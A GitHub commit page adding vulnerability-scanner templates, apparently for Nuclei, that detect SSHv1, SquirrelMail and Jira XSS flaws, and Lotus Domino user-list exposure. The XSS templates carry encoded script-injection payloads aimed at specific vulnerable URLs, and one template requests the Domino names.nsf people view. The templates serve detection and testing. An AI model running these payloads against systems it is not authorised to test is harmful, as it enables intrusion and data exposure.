-
Notifications
You must be signed in to change notification settings - Fork 52
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
test
committed
Dec 24, 2024
1 parent
006b368
commit e3f255e
Showing
4,268 changed files
with
201,622 additions
and
668,240 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
id: deprecated-sshv1-detection | ||
|
||
info: | ||
name: Deprecated SSHv1 Protocol Detection | ||
author: iamthefrogy | ||
severity: medium | ||
tags: network,ssh,openssh | ||
description: SSHv1 is a deprecated and have known cryptographic issues. | ||
reference: | | ||
- https://www.kb.cert.org/vuls/id/684820 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473 | ||
network: | ||
- host: | ||
- "{{Hostname}}" | ||
- "{{Hostname}}:22" | ||
matchers: | ||
- type: word | ||
words: | ||
- "SSH-1" |
This file was deleted.
Oops, something went wrong.
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
id: CVE-2004-0519 | ||
|
||
info: | ||
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting | ||
author: dhiyaneshDk | ||
severity: medium | ||
description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php. | ||
remediation: Upgrade to the latest version. | ||
reference: | ||
- https://www.exploit-db.com/exploits/24068 | ||
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc | ||
tags: xss,squirrelmail,cve2004,cve | ||
classification: | ||
cve-id: CVE-2004-0519 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
part: body | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- "text/html" | ||
|
||
# Enhanced by mp on 2022/01/27 |
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
id: CVE-2005-2428 | ||
info: | ||
name: CVE-2005-2428 | ||
author: CasperGN | ||
severity: medium | ||
tags: cve,cve2005 | ||
description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696. | ||
reference: | ||
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf | ||
- https://www.exploit-db.com/exploits/39495 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/names.nsf/People?OpenView" | ||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
- type: regex | ||
name: domino-username | ||
regex: | ||
- '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)' | ||
part: body |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
id: CVE-2007-0885 | ||
|
||
info: | ||
name: Rainbow.Zen Jira XSS | ||
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. | ||
reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded | ||
author: geeknik | ||
severity: medium | ||
tags: cve,cve2007,jira,xss | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- '"><script>alert(document.domain)</script>' | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- "text/html" |
Oops, something went wrong.